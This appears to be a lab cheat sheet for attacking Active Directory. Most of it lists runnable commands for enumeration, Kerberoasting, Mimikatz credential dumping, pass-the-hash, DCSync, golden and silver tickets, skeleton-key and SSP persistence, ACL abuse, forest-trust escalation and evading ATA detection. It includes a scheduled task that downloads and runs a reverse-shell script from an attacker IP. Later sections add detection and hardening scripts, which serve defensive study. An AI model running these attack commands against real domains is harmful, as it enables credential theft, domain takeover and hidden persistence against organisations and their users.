Cyber WarFare Labs

1) Enumeration using the AD Module and PowerView (either one)



1.1) PowerShell:

$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADClass::GetCurrentDomain()
            
$context = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain','cyberwarfare.corp')
$ADClass::GetDomain($context)

1.2) AD Module:

Get-ADDomain
Get-ADDomain -Identity cyberwarfare.corp
(Get-ADDomain).DomainSID
Get-ADDomainController
Get-ADDomainController -Domain cyberwarfare.corp -Discover -verbose
            
Get-ADUser -Identity studentuser1 -Properties *
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
            
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description
            
            
Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter 'OperatingSystem -like "*Windows Server 2016 Standard*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer -Filter * -Properties *
            
Get-ADGroup -Filter * -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
Get-ADGroupMember -Identity "Domain Admins" -Recursive
(Members of DA)
Get-ADPrincipalGroupMembership -Identity studentuser1
(Group membership of studentuser1)
            
GPO Enumeration: - 
            
Get-ADOrganizationalUnit -Filter * -Properties *
            
Trust Enumeration: - 
            
Get-ADForest
(Get-ADForest).Domains
            
Get-ADTrust
Get-ADTrust -Identity cyberwarfare.corp
        

1.3) Using PowerView: -

Get-NetLocalGroup -ComputerName enterprise-dc -Recurse
Get-NetDomain
Get-NetDomain -Domain cyberwarfare.corp
Get-DomainSID 
            
Get-NetDomainController
Get-NetDomainController -Domain cyberwarfare.corp
            
Get-NetUser
Get-NetUser -UserName emp1
            
Get-UserProperty 
Get-ObjectAcl -SamAccountName studentuser1 -ResolveGUIDs
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=cyberwarfare,DC=corp').Access 
Invoke-ACLScanner -ResolveGUIDs
            
Get-NetForest
Get-NetForestDomain
            
Get-NetDomainTrust
Get-NetDomainTrust -Domain cyberwarfare.corp

2) Attacks

2.1) Kerberoasting:
-> Identification: 
        
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
            
Get-NetUser -SPN
            
-> Abuse: 
            
Add-Type -AssemblyName System.IdentityModel
            
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "cyberwarfare/serviceacc"
            
OR 
            
Request-SPNTicket
            
klist.exe
            
Invoke-Mimikatz -Command '"kerberos::list /export"'
            
python.exe .\tgsrepcrack.py < dict > < exported_ticket >

2.2) Targeted Kerberoasting: -

Get-DomainUser -Identity user1 | select serviceprincipalname
        
Get-ADUser -Identity user1 -Properties ServicePrincipalName | select ServicePrincipalName
            
            
            
Set-DomainObject -Identity user -Set @{serviceprincipalname='what/what'}
            
OR
            
Set-ADUser -Identity user -ServicePrincipalNames @{Add='what/what'} 
            
            
Add-Type -AssemblyName System.IdentityModel
            
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "what/what"
            
OR 
            
Request-SPNTicket
            
            
klist.exe
            
Invoke-Mimikatz -Command '"kerberos::list /export"'
            
python.exe .\tgsrepcrack.py < dict > < exported_ticket >

2.3) Lateral Movement:

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
        
Invoke-Mimikatz -Command '"sekurlsa::ekeys"' -ComputerName @("sys1", "sys2") 
            
Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:cyberwarfare.corp /aes256: /run:powershell.exe"'
            
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'

2.4) Privilege Escalation: Unconstrained Delegation

Get-NetComputer -UnConstrained
        
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
            
Get-ADUser -Filter {TrustedForDelegation -eq $True}
 

2.5) Printer Bug Abuse:

https://github.com/leechristensen/SpoolSample
        
.\MS-RPRN.exe \\Unconstrained_delegation_mach \\Main-DC
            
            
            
(Attacker machine - capture the hash of the DC computer account)
            
.\Rubeus.exe monitor /interval:5 
            
            
.\Rubeus.exe ptt /ticket:< captured_Ticket >
            
            
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'

3) Persistence:



3.1) Golden Ticket:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName Enterprise-dc
        
(hash of krbtgt account)
            
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-xxxxxx-xxxxx6-xxxxxxxxx /krbtgt:< krb_hash > /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

3.2) Silver Ticket (CIFS access):

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-2xxxxx7-252xxxxx-xxxxx5708 /target:enterprise-dc /service:cifs /rc4: /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' 
        
        
(HOST ticket for scheduling tasks)
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-xxxxxx-xxxxx-1xxxxx708  /target:enterprise-dc.cyberwarfare.corp /service:HOST /rc4:xxx /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' 
                
                
schtasks /create /S enterprise-dc.cyberwarfare.corp /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.100.X:8080/Invoke-PowerShellTcp.ps1''')'"
                
                
schtasks /Run /S enterprise-dc.cyberwarfare.corp /TN "STCheck"

3.3) Skeleton Key:

(DA required )
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName enterprise-dc.cyberwarfare.corp
            
(Access any machine with valid username and 'mimikatz' password)
            
Enter-PSSession -ComputerName enterprise-dc.cyberwarfare.corp -Credential cyberwarfare\Administrator

3.4) DSRM Password:

(Extract DA hash, Requires DA privileges)
        
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername enterprise-dc.cyberwarfare.corp
            
            
(Compare the Administrator hash with the Administrator hash of below command)
            
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername enterprise-dc.cyberwarfare.corp
            
            
(Change Logon Behaviour for the DSRM account )
Enter-PSSession -Computername enterprise-dc.cyberwarfare.corp
            
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
            
            
(PTH of DSRM account)
            
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:cyberwarfare.corp /user:Administrator /ntlm: /run:powershell.exe"'
            
            
ls \\enterprise-dc.cyberwarfare.corp\C$
            
Enter-PSSession -ComputerName enterprise-dc -Authentication Negotiate

3.5) Custom SSP: -

- Drop the mimilib.dll to system32 and add mimilib to: 
        
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages:
            
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
            
$packages += "mimilib"
            
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
            
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages 
            
OR 
            
Invoke-Mimikatz -Command '"misc::memssp"'
            
local logons are visible to "C:\Windows\system32\kiwissp.log"
 

3.6) AdminSDHolder ACLs (Requires DA): -

FULLCONTROL PERMISSIONS (PowerView): -

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName emp1 -Rights All -Verbose  
            
Reset Passwords -

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName emp1 -Rights ResetPassword -Verbose
            
Check DA permissions on emp1: - 
            
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'emp1'}
            
Abusing FullControl (powerview):
            
Add-DomainGroupMember -Identity 'Domain Admins' -Members notDA -Verbose
            
Abusing ResetPassword (PowerView): 
            
Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
            
Add rights for DCSync(PowerView): - 
            
Add-ObjectAcl -TargetDistinguishedName 'DC=cyberwarfare,DC=corp' -PrincipalSamAccountName emp1 -Rights DCSync -Verbose
            
Set-ADACL -SamAccountName emp1 -DistinguishedName 'DC=cyberwarfare,DC=corp' -GUIDRight DCSync -Verbose
            
Execute DCSync as emp1:
            
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'


Intro about Azure AD: -

AD Connect synchronizes password hashes every two minutes. In an enterprise environment the MSOL_ account is commonly excluded from tools like ATA, which allows us to run DCSync as that account without any alerts.

4) Child to Forest Root: -


4.1) Trust key:

[In] trust key from child to parent: 
        
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName child.enterprise-dc
            
OR 
            
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
            
            
Invoke-Mimikatz -Command '"kerberos::golden /domain:child.cyberwarfare.corp /sid: /sids: /rc4: /user:Administrator /service:krbtgt /target:cyberwarfare.corp /ticket:C:\AD\Tools\kekeo\x64\trust_tkt.kirbi"'
            

(Service to request depends on the access needed: HOST and RPCSS for WMI; HOST and HTTP for PowerShell Remoting and WinRM)
            

tgs::ask /tgt:C:\AD\Tools\kekeo\x64\trust_tkt.kirbi /service:CIFS/enterprise-dc.cyberwarfare.corp
            
OR 
            
.\asktgs.exe .\trust_tkt.kirbi CIFS/enterprise-dc.cyberwarfare.corp
                
            
misc::convert lsa tkt.kirbi
            

.\kirbikator.exe lsa .\< ticket.kirbi >
            

ls \\enterprise-dc.cyberwarfare.corp\c$

4.2) SID History:

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:child.cyberwarfare.corp /sid: /krbtgt: /sids: /ptt"' 
        
ls \\enterprise-dc.cyberwarfare.corp\c$
                
Enter-PSSession enterprise-dc.cyberwarfare.corp
                
                
Avoid Suspicious logs: - 
                
Invoke-Mimikatz -Command '"kerberos::golden /user:enterprise-dc$ /domain:cyberwarfare.corp /sid:S-1-5-21-xxxx-2xxxx-xxxxxxxxx /groups:516 /krbtgt:< child > /sids:S-1-5-21-xxxx-37xxxx478-2xxxxxxxx6-516,S-1-5-9 /ptt"'
                
                
S-1-5-21-xxxxxx-xxxxxx-xxxxxxxx-516 – Domain Controllers
                
S-1-5-9 – Enterprise Domain Controllers
                
                
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\Administrator /domain:cyberwarfare.corp"'

5) SQL server enumeration: -

Discovery (SPN Scanning)
        
Get-SQLInstanceDomain
            
Check Accessibility
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
            
Gather Information
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
            
< Impersonation >

6) Detection and Defense


6.1) Golden Ticket: -

Event ID
– 4624: Account Logon
– 4672: Admin Logon
            
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List -Property *

6.2) Silver Ticket: -

Event ID
        
– 4624: Account Logon
– 4634: Account Logoff
– 4672: Admin Logon
            
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List -Property *
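The 4672/4624 pair listed for 6.1 and 6.2 only becomes useful once the two events are joined per logon session. The following is an added example, not part of the original cheat sheet: it correlates each 4672 (admin logon) with its 4624 via the logon ID, then flags two traits that forged tickets commonly show, an account name that does not exist in AD and a domain field that is not the NetBIOS domain name. The computer name, event counts and the heuristics themselves are assumptions to tune for your environment.

```powershell
# Added example (not from the original cheat sheet): correlate 4672 admin logons with
# their 4624 logon event and flag accounts unknown to AD or with an unexpected domain field.
Import-Module ActiveDirectory

# Turn an EventLogRecord into a hashtable of its EventData fields (name -> value).
function ConvertTo-EventDataTable {
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Event)
    $table = @{}
    foreach ($node in ([xml]$Event.ToXml()).Event.EventData.Data) {
        $table[$node.Name] = $node.'#text'
    }
    return $table
}

function Get-AdminLogonReport {
    param(
        [int]$MaxEvents = 500,
        [string]$ComputerName = $env:COMPUTERNAME   # assumed: the DC whose Security log is reviewed
    )
    $admin  = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'Security'; ID = 4672 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    $logons = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'Security'; ID = 4624 } -MaxEvents ($MaxEvents * 4) -ErrorAction SilentlyContinue

    # Index 4624 by TargetLogonId so each 4672 (keyed by SubjectLogonId) finds its session.
    $byLogonId = @{}
    foreach ($l in $logons) {
        $d = ConvertTo-EventDataTable $l
        if ($d['TargetLogonId']) { $byLogonId[$d['TargetLogonId']] = $d }
    }
    $netbios = (Get-ADDomain).NetBIOSName

    foreach ($a in $admin) {
        $ad   = ConvertTo-EventDataTable $a
        $user = $ad['SubjectUserName']
        # Machine accounts and SYSTEM generate most 4672s; skip them to keep the report readable.
        if ($user -like '*$' -or $user -eq 'SYSTEM') { continue }
        $session = $byLogonId[$ad['SubjectLogonId']]
        $escaped = $user -replace "'", "''"
        $exists  = $null -ne (Get-ADUser -Filter "SamAccountName -eq '$escaped'" -ErrorAction SilentlyContinue)
        [pscustomobject]@{
            Time               = $a.TimeCreated
            User               = $user
            Domain             = $ad['SubjectDomainName']
            LogonType          = $session['LogonType']
            AuthPackage        = $session['AuthenticationPackageName']
            ClientIP           = $session['IpAddress']
            AccountExistsInAD  = $exists
            DomainNameMismatch = ($ad['SubjectDomainName'] -ne $netbios)
        }
    }
}

# Triage list: local accounts on member servers legitimately show the host name as Domain,
# so review these rows rather than alerting on every one.
Get-AdminLogonReport | Where-Object { -not $_.AccountExistsInAD -or $_.DomainNameMismatch } | Format-Table -AutoSize
```

Run it on the DC (or point -ComputerName at it with WinRM/RPC access). Silver tickets never touch the DC, so for 6.2 run the same function against the member server that hosts the targeted service.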

6.3) Skeleton Key:

Events
        
– System Event ID 7045 – A service was installed in the system (type: kernel-mode driver)
            
Events ("Audit privilege use" must be enabled)
            
– Security Event ID 4673 – Sensitive Privilege Use
– Event ID 4611 – A trusted logon process has been registered with the Local Security Authority
            
Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*"} 
            
(Run lsass.exe as protected process)
New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name RunAsPPL -Value 1 -PropertyType DWORD -Verbose
            
Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like "*protected process*"}

6.4) DSRM Detection:

Event ID 4657 - Audit creation/change of HKLM:\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior

6.5) Malicious SSP:

Event ID 4657 - Audit creation/change of HKLM:\System\CurrentControlSet\Control\Lsa\Security Packages
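Sections 6.3, 6.4 and 6.5 all come down to three LSA registry values (RunAsPPL, DsrmAdminLogonBehavior, Security Packages) and the 4657 events that record changes to them. The following is an added example, not part of the original cheat sheet: it reads the current values from a host, compares them with an assumed baseline, and pulls the 4657 events for those value names. The default package list is an assumption; capture it from a known-good build before relying on it.

```powershell
# Added example (not from the original cheat sheet): audit the LSA values behind 6.3, 6.4 and 6.5
# and list the 4657 registry-change events that touched them.
function Test-LsaHardening {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        # Assumed default SSP list; replace with the value captured from a known-good build.
        [string[]]$KnownPackages = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap')
    )
    $read = {
        $lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
        $os  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
        [pscustomobject]@{
            RunAsPPL               = $lsa.RunAsPPL
            DsrmAdminLogonBehavior = $lsa.DsrmAdminLogonBehavior
            LsaPackages            = @($lsa.'Security Packages')
            OSConfigPackages       = @($os.'Security Packages')
        }
    }
    $cfg = if ($ComputerName -eq $env:COMPUTERNAME) { & $read } else { Invoke-Command -ComputerName $ComputerName -ScriptBlock $read }

    $findings = New-Object System.Collections.Generic.List[string]
    if ($cfg.RunAsPPL -ne 1) {
        $findings.Add('RunAsPPL is not 1: lsass.exe is not running as a protected process')
    }
    if ($cfg.DsrmAdminLogonBehavior -in 1, 2) {
        $findings.Add("DsrmAdminLogonBehavior is $($cfg.DsrmAdminLogonBehavior): DSRM logon enabled outside DSRM (1 = when AD DS is stopped, 2 = always)")
    }
    $packages = @($cfg.LsaPackages + $cfg.OSConfigPackages) |
        Where-Object { -not [string]::IsNullOrWhiteSpace($_) } | Sort-Object -Unique
    foreach ($p in $packages) {
        if ($KnownPackages -notcontains $p) { $findings.Add("Unexpected security package registered: $p") }
    }
    [pscustomobject]@{ Computer = $ComputerName; Config = $cfg; Findings = $findings }
}

# 4657 (registry value modified) is only written when a SACL is set on the Lsa key and
# "Audit Registry" is enabled; filter it on the three value names above.
function Get-LsaRegistryChange {
    param([string]$ComputerName = $env:COMPUTERNAME, [int]$MaxEvents = 1000)
    $watched = 'RunAsPPL', 'DsrmAdminLogonBehavior', 'Security Packages'
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'Security'; ID = 4657 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = @{}
            foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            if ($watched -contains $d['ObjectValueName']) {
                [pscustomobject]@{
                    Time     = $_.TimeCreated
                    By       = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                    Key      = $d['ObjectName']
                    Value    = $d['ObjectValueName']
                    OldValue = $d['OldValue']
                    NewValue = $d['NewValue']
                    Process  = $d['ProcessName']
                }
            }
        }
}

Test-LsaHardening | Select-Object -ExpandProperty Findings
Get-LsaRegistryChange | Format-Table -AutoSize
```

Run Test-LsaHardening against every DC on a schedule and diff the Findings list; a new entry in Security Packages, or DsrmAdminLogonBehavior appearing at all, is the signal the page's 4657 rules are looking for.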

6.6) kerberoasting:

Security Event ID 4769 – A Kerberos ticket was requested.
        
        
Since 4769 is logged very frequently on a DC, filter the results on the following fields from the event:
            
– Service name should not be krbtgt
– Service name does not end with $ (to filter out machine accounts used for services)
– Account name should not be machine@domain (to filter out requests from machines)
– Failure code is '0x0' (to filter out failures; 0x0 is success)
– Most importantly, ticket encryption type is 0x17
            
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -notlike '*krbtgt' -and $_.Message.split("`n")[8] -notlike '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select -ExpandProperty message
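Splitting the Message text by line number breaks as soon as the message template or locale changes. The following is an added example, not part of the original cheat sheet: it applies the same five filters to the event's XML fields (ServiceName, TargetUserName, Status, TicketEncryptionType) and then groups the survivors by requesting account and client address, which is the shape a Kerberoasting run actually takes in the log. The computer name and event count are assumptions.

```powershell
# Added example (not from the original cheat sheet): the five 4769 filters applied to the
# event's XML fields instead of to positions in the Message text, then summarised per requester.
function Get-KerberoastCandidate {
    param(
        [int]$MaxEvents = 1000,
        [string]$ComputerName = $env:COMPUTERNAME   # assumed: a domain controller
    )
    $events = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'Security'; ID = 4769 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $d = @{}
        foreach ($n in ([xml]$e.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        $service = $d['ServiceName']
        $account = $d['TargetUserName']
        if ($service -eq 'krbtgt')                 { continue }   # TGT requests, not service tickets
        if ($service -like '*$')                   { continue }   # machine-account SPNs
        if ($account -like '*$@*')                 { continue }   # requests made by machines
        if ($d['Status'] -ne '0x0')                { continue }   # failures
        if ($d['TicketEncryptionType'] -ne '0x17') { continue }   # RC4-HMAC tickets only
        [pscustomobject]@{
            Time     = $e.TimeCreated
            Account  = $account
            Service  = $service
            ClientIP = $d['IpAddress']
        }
    }
}

# One account pulling RC4 tickets for many distinct SPNs in a short window is the pattern to alert on.
Get-KerberoastCandidate |
    Group-Object Account, ClientIP |
    Sort-Object Count -Descending |
    Select-Object Count, Name, @{ n = 'Services'; e = { ($_.Group.Service | Sort-Object -Unique) -join ', ' } } |
    Format-Table -AutoSize
```

A single RC4 service-ticket request is normal for legacy services; the alert threshold belongs on the number of distinct services per account, not on the individual event.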

6.7) Unconstrained Delegation:

- Limit Privileged users sessions to DC or required servers.
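Limiting privileged sessions is only enforceable once you know which hosts are trusted for unconstrained delegation and which admin accounts can still be delegated. The following is an added example, not part of the original cheat sheet: it lists non-DC computers and users with the flag, then reports privileged accounts that are neither marked "Account is sensitive and cannot be delegated" nor members of Protected Users, and includes a one-call remediation. The group names and the use of the current domain are assumptions.

```powershell
# Added example (not from the original cheat sheet): audit unconstrained delegation and the
# privileged accounts whose TGTs could be captured on such hosts.
Import-Module ActiveDirectory

function Get-UnconstrainedDelegationReport {
    param([string]$Server = (Get-ADDomain).DNSRoot)   # assumed: current domain
    # DCs carry TrustedForDelegation by design; exclude them from the computer list.
    $dcDNs = (Get-ADDomainController -Filter * -Server $Server).ComputerObjectDN

    $computers = Get-ADComputer -Server $Server -Filter { TrustedForDelegation -eq $true } -Properties OperatingSystem |
        Where-Object { $dcDNs -notcontains $_.DistinguishedName }
    $users = Get-ADUser -Server $Server -Filter { TrustedForDelegation -eq $true }

    $protected = @()
    try { $protected = @((Get-ADGroupMember -Identity 'Protected Users' -Recursive -Server $Server).DistinguishedName) } catch { }

    # Enterprise Admins only exists in the forest root; ignore lookups that fail elsewhere.
    $privileged = foreach ($group in 'Domain Admins', 'Enterprise Admins', 'Administrators') {
        try {
            Get-ADGroupMember -Identity $group -Recursive -Server $Server | Where-Object objectClass -eq 'user'
        } catch { }
    }
    $delegatable = $privileged | Sort-Object DistinguishedName -Unique |
        Get-ADUser -Server $Server -Properties AccountNotDelegated |
        Where-Object { -not $_.AccountNotDelegated -and $protected -notcontains $_.DistinguishedName }

    [pscustomobject]@{
        UnconstrainedComputers = @($computers | Select-Object -ExpandProperty Name)
        UnconstrainedUsers     = @($users | Select-Object -ExpandProperty SamAccountName)
        DelegatableAdmins      = @($delegatable | Select-Object -ExpandProperty SamAccountName)
    }
}

# Remediation for one account: set "Account is sensitive and cannot be delegated".
function Protect-PrivilegedAccount {
    param(
        [Parameter(Mandatory)][string]$SamAccountName,
        [string]$Server = (Get-ADDomain).DNSRoot
    )
    Set-ADUser -Identity $SamAccountName -Server $Server -AccountNotDelegated $true
}

Get-UnconstrainedDelegationReport | Format-List
```

Every name in DelegatableAdmins is an account whose TGT would be usable from any host in UnconstrainedComputers; add those accounts to Protected Users or run Protect-PrivilegedAccount on them, and treat any non-DC entry in UnconstrainedComputers as a tier-0 asset.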

6.8) ACL Attacks

Events
– Security Event ID 4662 (Audit Policy for object must be enabled) – An operation was performed on an object
– Security Event ID 5136 (Audit Policy for object must be enabled) – A directory service object was modified
– Security Event ID 4670 (Audit Policy for object must be enabled) – Permissions on an object were changed    
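The events above tell you that an ACL changed; you also need to know who currently holds the two rights this page abuses (AdminSDHolder ACEs and replication rights on the domain head). The following is an added example, not part of the original cheat sheet: it lists DCSync-capable principals from the domain ACL, lists non-default principals on AdminSDHolder, and pulls the 5136 events that modified either object's nTSecurityDescriptor. The "expected principals" list is an assumed baseline, and the 5136 query assumes it runs on the DC that processed the change.

```powershell
# Added example (not from the original cheat sheet): who holds DCSync rights, who has
# non-default ACEs on AdminSDHolder, and which 5136 events changed those security descriptors.
Import-Module ActiveDirectory

# Control-access-right GUIDs that together grant directory replication (DCSync).
$ReplicationRightGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-DCSyncRightsHolder {
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName)
    $acl = Get-Acl -Path "AD:\$DomainDN"
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and (
            $ReplicationRightGuids.ContainsKey($_.ObjectType.ToString()) -or
            $_.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll)
        )
    } | Select-Object IdentityReference, IsInherited, @{ n = 'Right'; e = {
            if ($ReplicationRightGuids.ContainsKey($_.ObjectType.ToString())) { $ReplicationRightGuids[$_.ObjectType.ToString()] } else { 'GenericAll' }
        } }
}

function Get-AdminSDHolderAce {
    param(
        [string]$DomainDN = (Get-ADDomain).DistinguishedName,
        # Assumed default principals on AdminSDHolder; anything else needs an explanation.
        [string[]]$Expected = @('SYSTEM', 'Administrators', 'SELF', 'Domain Admins', 'Enterprise Admins', 'Everyone',
            'Authenticated Users', 'Pre-Windows 2000 Compatible Access', 'Cert Publishers',
            'Windows Authorization Access Group', 'Terminal Server License Servers', 'ENTERPRISE DOMAIN CONTROLLERS')
    )
    $acl = Get-Acl -Path "AD:\CN=AdminSDHolder,CN=System,$DomainDN"
    $acl.Access | Where-Object {
        $name = ($_.IdentityReference.Value -split '\\')[-1]
        $Expected -notcontains $name
    } | Select-Object IdentityReference, ActiveDirectoryRights, AccessControlType, ObjectType
}

# 5136 (directory object modified) needs "Audit Directory Service Changes" plus a SACL on the objects.
function Get-SecurityDescriptorChange {
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName, [int]$MaxEvents = 2000)
    $targets = @("CN=AdminSDHolder,CN=System,$DomainDN", $DomainDN)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; ID = 5136 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = @{}
            foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            if ($d['AttributeLDAPDisplayName'] -eq 'nTSecurityDescriptor' -and $targets -contains $d['ObjectDN']) {
                [pscustomobject]@{
                    Time      = $_.TimeCreated
                    By        = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                    Object    = $d['ObjectDN']
                    Operation = $d['OperationType']   # raw value: %%14674 = value added, %%14675 = value deleted
                }
            }
        }
}

Get-DCSyncRightsHolder    | Format-Table -AutoSize
Get-AdminSDHolderAce      | Format-Table -AutoSize
Get-SecurityDescriptorChange | Format-Table -AutoSize
```

By default only SYSTEM, Administrators, Domain Controllers, Enterprise Domain Controllers and (for the filtered set) Enterprise Read-only Domain Controllers should appear from Get-DCSyncRightsHolder, plus any Azure AD Connect MSOL_ account; a plain user such as emp1 in that list is exactly the condition the Add-ObjectAcl commands above create.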

6.9) Selective Authentication:

In an inter-forest trust, if Selective Authentication is configured, users between the trusts will not be automatically authenticated. Individual access to domains and servers in the trusting domain/forest should be given.

7) ATA useful for detecting: -

-> Recon: Account enum, Netsession enum
-> Compromised Credentials Attacks: Brute force, High privilege account/service account exposed in clear text, Honey token, unusual protocol (NTLM and Kerberos)
-> Credential/Hash/Ticket Replay attacks.

7.1) Misc

If we have NTLM hash of a DC, we can extract NTLM hashes of any machine account using netsync.
        
Invoke-Mimikatz -Command '"lsadump::netsync /dc:enterprise-dc.cyberwarfare.corp /user:enterprise-dc$ /ntlm:< hash_of_DC_computer_account > /account:$"'
            
Forge a Golden Ticket with SID History of the Domain Controllers group and Enterprise Domain Controllers Group (ATA Bypass): - 
            
Invoke-Mimikatz -Command '"kerberos::golden /user:enterprise-dc$ /domain:cyberwarfare.corp /sid:< SID > /groups:516 /krbtgt:< SID > /sids:S-1-5-21-2xxxx3-xxxx-240xxxxx-516,S-1-5-9 /ptt"'